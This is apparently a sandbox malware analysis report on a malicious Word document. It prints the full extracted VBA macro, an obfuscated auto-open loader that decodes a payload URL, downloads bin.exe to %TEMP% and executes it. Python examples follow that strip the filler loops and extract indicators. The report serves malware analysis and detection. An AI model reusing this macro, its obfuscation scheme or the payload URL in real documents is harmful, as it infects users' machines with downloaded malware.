Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4d7c6a2e9e5b9634…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 37.5 KB
Created: 2014-12-08 20:39:00
Authoring application: Microsoft Office Word
First seen: 2015-01-04
MD5: 38368ef451cbe4120f427e4b79405c6c
SHA-1: 78794c541247404e1348218b3a5bc8e867a9bc0d
SHA-256: 4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38
Risk score: 386

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample carries a VBA project in the ThisDocument module whose real logic is four statements; everything else is nested For/Next loops that call DoEvents and discard the result, padding the code so that scanners and simple emulators see mostly filler. Two auto-exec entry points call pJIBidfsdfgF, which calls dfgfdYUHKJ: AutoOpen, which Word runs when the document opens, and Workbook_Open, which is an Excel event and never fires in a Word document (dead code carried over from a kit template). dfgfdYUHKJ decodes its strings with a custom HexToString function (one byte per hex pair, with even the "&H" prefix assembled from Chr$(38) & Chr$(72)), so the URL, drop path and COM ProgID never appear in the plain macro source. Decoding the hex literals on the page gives the download URL http://Lichtblick-tiere.de/js/bin.exe, the drop path %TEMP%\1V2MUY2XWYSFXQ.exe and the ProgID Shell.Application. The macro calls URLDownloadToFileA from urlmon to fetch the second stage to that path and then runs it with Shell.Application.Open. Capability is download-and-execute only: bin.exe was not available to static analysis, so what it does is not established here. This matches the ClamAV Doc.Downloader.Macr-1 detection and the critical heuristics for obfuscated auto-exec loaders and URL downloading. One finding, OLE_LEGACY_WORDBASIC_AUTOEXEC, states that no modern VBA project was recovered; the extracted macros.bas below shows that it was, so that finding adds nothing beyond the AutoOpen marker.

Heuristics (12)

  • ClamAV: Doc.Downloader.Macr-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macr-1
  • Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
    The file contains a reference to the URLDownloadToFile API.
  • VBA macros detected (medium, OLE_VBA_MACROS; 7 related findings)
    Document contains VBA macro code
  • URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD)
    The VBA source declares and calls URLDownloadToFile.
    Matched line in script:
        Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script:
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro (low, OLE_VBA_WBOPEN)
    Matched line in script:
        Sub Workbook_Open()
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Matched line in script:
        pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5817 bytes
SHA-256: 6479fcee0bca15eb04606e1d901adda4599aa8b548ff88118b9a0ab1c49ad125
Detection
ClamAV: No threats found
Obfuscation or payload: likely
62 of 100 identifiers look randomly generated (e.g. 'pJIBidfsdfgF') — consistent with name-mangling obfuscation.
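The 62-of-100 figure comes from the scanner's own identifier check, whose rules are not shown on this page. As an added example (not the scanner's code and not part of the original report), the following implements one plausible version of such a check: it splits each identifier into camel-case fragments and flags names with a long consonant run, almost no vowels, or mostly one-to-two-letter fragments. The name list is copied from the macro printed below; the three thresholds are assumptions and will not reproduce the scanner's exact count.

```python
import re

VOWELS = set("aeiou")


def camel_segments(name):
    """Split an identifier on underscores and camel-case boundaries.

    'HexToString' -> ['Hex', 'To', 'String'];  'eEvLrfmk' -> ['e', 'Ev', 'Lrfmk']
    """
    segments = []
    for part in name.split("_"):
        segments += re.findall(r"[A-Z]+(?=[A-Z][a-z])|[A-Z]?[a-z]+|[A-Z]+|\d+", part)
    return segments


def longest_consonant_run(name):
    """Length of the longest run of consonants (y is counted as a consonant)."""
    run = best = 0
    for ch in name.lower():
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def looks_random(name):
    """Assumed heuristic (not the scanner's): flag a name that has a long
    consonant run, almost no vowels, or is mostly 1-2 letter camel fragments."""
    letters = [c for c in name.lower() if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / max(len(letters), 1)
    segments = camel_segments(name)
    short = sum(len(s) <= 2 for s in segments)
    return (
        longest_consonant_run(name) >= 4                       # 'dfgfd', 'HBKJdg'
        or vowel_ratio < 0.2                                   # 'dfgfdYUHKJ'
        or (len(segments) >= 3 and 2 * short > len(segments))  # 'SAYgiaqO'
    )


def random_identifier_ratio(names):
    """Return (flagged, total) over a list of identifiers."""
    return sum(looks_random(n) for n in names), len(names)


# Identifiers copied from the macro printed below: eight mangled names plus the
# four meaningful ones (the decoder, both auto-exec entry points, the import).
SAMPLE_NAMES = [
    "pJIBidfsdfgF", "eEvLrfmk", "baWfWDze", "SAYgiaqO", "ioHBKJdg",
    "pPPhujkfg", "fdfgdfeer4gf", "dfgfdYUHKJ",
    "HexToString", "AutoOpen", "Workbook_Open", "URLDownloadToFileA",
]

if __name__ == "__main__":
    flagged, total = random_identifier_ratio(SAMPLE_NAMES)
    print(f"{flagged} of {total} identifiers look randomly generated")
```

The Win32 import URLDownloadToFileA is the awkward case for any such rule: its trailing "A" is a one-letter fragment and "URLD" is nearly a consonant run, which is why the camel-fragment rule requires a majority of short fragments rather than any single one.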
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#Else
    Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#End If



Sub pJIBidfsdfgF()
Dim eEvLrfmk As Integer
For eEvLrfmk = 0 To 3
Dim baWfWDze As Integer
For baWfWDze = 0 To 7
Dim SAYgiaqO As Integer
For SAYgiaqO = 0 To 3
DoEvents
Next SAYgiaqO
DoEvents
Next baWfWDze
Dim YqYhypAo As Integer
For YqYhypAo = 0 To 4
DoEvents
Next YqYhypAo
DoEvents
Next eEvLrfmk
Dim EEVzDOFd As Integer
For EEVzDOFd = 0 To 7
Dim zPXimGvf As Integer
For zPXimGvf = 0 To 8
DoEvents
Next zPXimGvf
DoEvents
Next EEVzDOFd
Dim pLIoZUak As Integer
For pLIoZUak = 0 To 9
DoEvents
Next pLIoZUak
dfgfdYUHKJ
End Sub
Sub AutoOpen()
Dim EbjbQDPq As Integer
For EbjbQDPq = 0 To 4
Dim CdllBhov As Integer
For CdllBhov = 0 To 7
Dim PQHZWtCI As Integer
For PQHZWtCI = 0 To 9
DoEvents
Next PQHZWtCI
DoEvents
Next CdllBhov
Dim kCQNamsp As Integer
For kCQNamsp = 0 To 5
DoEvents
Next kCQNamsp
DoEvents
Next EbjbQDPq
Dim twymuiQZ As Integer
For twymuiQZ = 0 To 9
Dim gdlbxxrS As Integer
For gdlbxxrS = 0 To 5
DoEvents
Next gdlbxxrS
DoEvents
Next twymuiQZ
Dim wwtnRgYJ As Integer
For wwtnRgYJ = 0 To 6
DoEvents
Next wwtnRgYJ
    pJIBidfsdfgF
End Sub
Sub Workbook_Open()
Dim lSDSjaIX As Integer
For lSDSjaIX = 0 To 5
Dim sTDHWGDR As Integer
For sTDHWGDR = 0 To 4
Dim sRKbXAsB As Integer
For sRKbXAsB = 0 To 8
DoEvents
Next sRKbXAsB
DoEvents
Next sTDHWGDR
Dim tkwqbUkk As Integer
For tkwqbUkk = 0 To 6
DoEvents
Next tkwqbUkk
DoEvents
Next lSDSjaIX
Dim lFnJrYhI As Integer
For lFnJrYhI = 0 To 5
Dim TlJYcqhc As Integer
For TlJYcqhc = 0 To 4
DoEvents
Next TlJYcqhc
DoEvents
Next lFnJrYhI
Dim vumjzjmH As Integer
For vumjzjmH = 0 To 3
DoEvents
Next vumjzjmH
    pJIBidfsdfgF
End Sub
Sub dfgfdYUHKJ()
Dim OLyhOPhV As Integer
For OLyhOPhV = 0 To 5
Dim ggfGxPRk As Integer
For ggfGxPRk = 0 To 1
Dim ZPjYCgvP As Integer
For ZPjYCgvP = 0 To 9
DoEvents
Next ZPjYCgvP
DoEvents
Next ggfGxPRk
Dim OLrUtuaF As Integer
For OLrUtuaF = 0 To 8
DoEvents
Next OLrUtuaF
DoEvents
Next OLyhOPhV
Dim lJjEgYjA As Integer
For lJjEgYjA = 0 To 2
Dim WbfHdOwR As Integer
For WbfHdOwR = 0 To 1
DoEvents
Next WbfHdOwR
DoEvents
Next lJjEgYjA
Dim RvlvZBKy As Integer
For RvlvZBKy = 0 To 7
DoEvents
Next RvlvZBKy
    ioHBKJdg = HexToString("687474703A2F2F4C69636874626C69636B2D74696572652E64652F6A732F62696E2E657865")

Dim RxEAjGVp As Integer
For RxEAjGVp = 0 To 1
Dim CgfDTtIw As Integer
For CgfDTtIw = 0 To 4
Dim FgQeLJJU As Integer
For FgQeLJJU = 0 To 6
DoEvents
Next FgQeLJJU
DoEvents
Next CgfDTtIw
Dim mUycLsvf As Integer
For mUycLsvf = 0 To 2
DoEvents
Next mUycLsvf
DoEvents
Next RxEAjGVp
Dim HzKcpqDF As Integer
For HzKcpqDF = 0 To 3
Dim OMaGEVHE As Integer
For OMaGEVHE = 0 To 3
DoEvents
Next OMaGEVHE
DoEvents
Next HzKcpqDF
Dim lLycLgdt As Integer
For lLycLgdt = 0 To 2
DoEvents
Next lLycLgdt
    pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
Dim DworZYei As Integer
For DworZYei = 0 To 6
Dim upqzZMmH As Integer
For upqzZMmH = 0 To 7
Dim HrUkDKOk As Integer
For HrUkDKOk = 0 To 1
DoEvents
Next HrUkDKOk
DoEvents
Next upqzZMmH
Dim sEVeUqFO As Integer
For sEVeUqFO = 0 To 7
DoEvents
Next sEVeUqFO
DoEvents
Next DworZYei
Dim DxzQCjfE As Integer
For DxzQCjfE = 0 To 6
Dim NNAFobqA As Integer
For NNAFobqA = 0 To 5
DoEvents
Next NNAFobqA
DoEvents
Next DxzQCjfE
Dim IBTxvGUe As Integer
For IBTxvGUe = 0 To 8
DoEvents
Next IBTxvGUe
    R = URLDownloadToFileA(0&, ioHBKJdg, pPPhujkfg, 0&, 0&)
Dim QThZvUng As Integer
For QThZvUng = 0 To 2
Dim jBETMSlj As Integer
For jBETMSlj = 0 To 5
Dim pHJEOhLq As Integer
For pHJEOhLq = 0 To 1
DoEvents
Next pHJEOhLq
DoEvents
Next jBETMSlj
Dim kMNMqpIw As Integer
For kMNMqpIw = 0 To 2
DoEvents
Next kMNMqpIw
DoEvents
Next QThZvUng
Dim qDujcKvO As Integer
For qDujcKvO = 0 To 4
Dim WZeUslhK As Integer
For WZeUslhK = 0 To 7
DoEvents
Next WZeUslhK
DoEvents
Next qDujcKvO
Dim zQGIlsKX As Integer
For zQGIlsKX = 0 To 8
DoEvents
Next zQGIlsKX
    Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
fdfgdfeer4gf.Open pPPhujkfg
End Sub

Public Function HexToString(ByVal jYsjanx As String) As String
Dim gTFhDP As String
Dim LdOSt As String
Dim eYqnKg As Long
For eYqnKg = 1 To Len(jYsjanx) Step 2
Dim KznwAUrB As Integer
For KznwAUrB = 0 To 7
Dim CcuMacGs As Integer
For CcuMacGs = 0 To 7
DoEvents
Next CcuMacGs
DoEvents
Next KznwAUrB
Dim tYMWohkh As Integer
For tYMWohkh = 0 To 9
DoEvents
Next tYMWohkh
gTFhDP = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(jYsjanx, eYqnKg, 2)))
Dim HdUMvIny As Integer
For HdUMvIny = 0 To 1
Dim kiZssepc As Integer
For kiZssepc = 0 To 5
DoEvents
Next kiZssepc
DoEvents
Next HdUMvIny
Dim sHZspsnX As Integer
For sHZspsnX = 0 To 7
DoEvents
Next sHZspsnX
LdOSt = LdOSt & gTFhDP
Next eYqnKg
Dim MFPIjRfh As Integer
For MFPIjRfh = 0 To 4
Dim xAlzqaHp As Integer
For xAlzqaHp = 0 To 8
DoEvents
Next xAlzqaHp
DoEvents
Next MFPIjRfh
Dim EPtelKlg As Integer
For EPtelKlg = 0 To 7
DoEvents
Next EPtelKlg
HexToString = LdOSt
End Function
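A deobfuscation pass over the macro above, written for this page as an added example (it is neither the scanner's output nor the malware author's code). It collapses the DoEvents filler loops, reimplements HexToString in Python, inlines the decoded strings, and then pulls out the indicators the heuristics above key on. The input is a trimmed copy of the extracted macros.bas (most filler loops cut, but every hex literal and every real statement kept as printed); the indicator regexes and the list of auto-exec procedure names are my assumptions, not the scanner's rules.

```python
import re

# Trimmed copy of the macros.bas printed above: one or two filler loops kept per
# routine, every hex literal and real statement kept as-is (constructed input).
SAMPLE_VBA = """\
Sub AutoOpen()
Dim EbjbQDPq As Integer
For EbjbQDPq = 0 To 4
Dim CdllBhov As Integer
For CdllBhov = 0 To 7
DoEvents
Next CdllBhov
DoEvents
Next EbjbQDPq
    pJIBidfsdfgF
End Sub
Sub Workbook_Open()
Dim lSDSjaIX As Integer
For lSDSjaIX = 0 To 5
DoEvents
Next lSDSjaIX
    pJIBidfsdfgF
End Sub
Sub dfgfdYUHKJ()
    ioHBKJdg = HexToString("687474703A2F2F4C69636874626C69636B2D74696572652E64652F6A732F62696E2E657865")
    pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
    R = URLDownloadToFileA(0&, ioHBKJdg, pPPhujkfg, 0&, 0&)
    Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
fdfgdfeer4gf.Open pPPhujkfg
End Sub
Public Function HexToString(ByVal jYsjanx As String) As String
Dim gTFhDP As String
Dim LdOSt As String
Dim eYqnKg As Long
For eYqnKg = 1 To Len(jYsjanx) Step 2
Dim KznwAUrB As Integer
For KznwAUrB = 0 To 7
DoEvents
Next KznwAUrB
gTFhDP = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(jYsjanx, eYqnKg, 2)))
LdOSt = LdOSt & gTFhDP
Next eYqnKg
HexToString = LdOSt
End Function
"""

# A filler loop is "For v = N To M" whose body is only DoEvents, optionally
# preceded by its own "Dim v As Integer". Repeating the pass collapses nesting:
# removing an inner loop leaves the outer one with a DoEvents-only body.
JUNK_LOOP = re.compile(
    r"^(?:Dim \w+ As Integer\n)?For (\w+) = \d+ To \d+\n(?:DoEvents\n)*Next \1\n",
    re.MULTILINE,
)


def strip_junk_loops(src):
    """Remove DoEvents filler loops, innermost first, until none are left.

    The decoder's real loop ("For ... = 1 To Len(...) Step 2") never matches:
    its bounds are not numeric literals and its body does work.
    """
    while True:
        src, count = JUNK_LOOP.subn("", src)
        if count == 0:
            return src


def hex_to_string(hexstr):
    """Python twin of the macro's HexToString: the VBA builds "&H" from
    Chr$(38) & Chr$(72), appends two hex digits and runs Val() then Chr$(),
    i.e. one byte per hex pair."""
    return bytes.fromhex(hexstr).decode("latin-1")


HEX_CALL = re.compile(r'HexToString\("([0-9A-Fa-f]+)"\)')


def inline_hex_strings(src):
    """Replace every HexToString("...") call with the decoded VBA string literal."""
    return HEX_CALL.sub(
        lambda m: '"' + hex_to_string(m.group(1)).replace('"', '""') + '"', src
    )


# Assumed indicator patterns for this report, not the scanner's rule set.
AUTOEXEC = re.compile(r"^\s*Sub (AutoOpen|Auto_Open|Workbook_Open|Document_Open)\(\)", re.M)
URL = re.compile(r'"(https?://[^"]+)"')
COM_OBJECT = re.compile(r'CreateObject\("([^"]+)"\)')
WIN32_API = re.compile(r"\b(URLDownloadToFileA?|ShellExecuteA?|WinExec)\b")
ENV_PATH = re.compile(r'Environ\("(\w+)"\) & "([^"]+)"')


def extract_iocs(src):
    """Deobfuscate the macro and collect the indicators the heuristics key on."""
    clean = inline_hex_strings(strip_junk_loops(src))
    return {
        "autoexec": AUTOEXEC.findall(clean),
        "urls": URL.findall(clean),
        "drop_paths": [f"%{env}%{tail}" for env, tail in ENV_PATH.findall(clean)],
        "com_objects": COM_OBJECT.findall(clean),
        "apis": sorted(set(WIN32_API.findall(clean))),
        "deobfuscated": clean,
    }


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_VBA)
    print({k: v for k, v in result.items() if k != "deobfuscated"})
    print(result["deobfuscated"])
```

Run against the full macros.bas the same pass reduces the 280-line preview to the four-line download-and-execute body plus the decoder, which is the fastest way to confirm that nothing beyond the URLDownloadToFileA and Shell.Application.Open sinks is present.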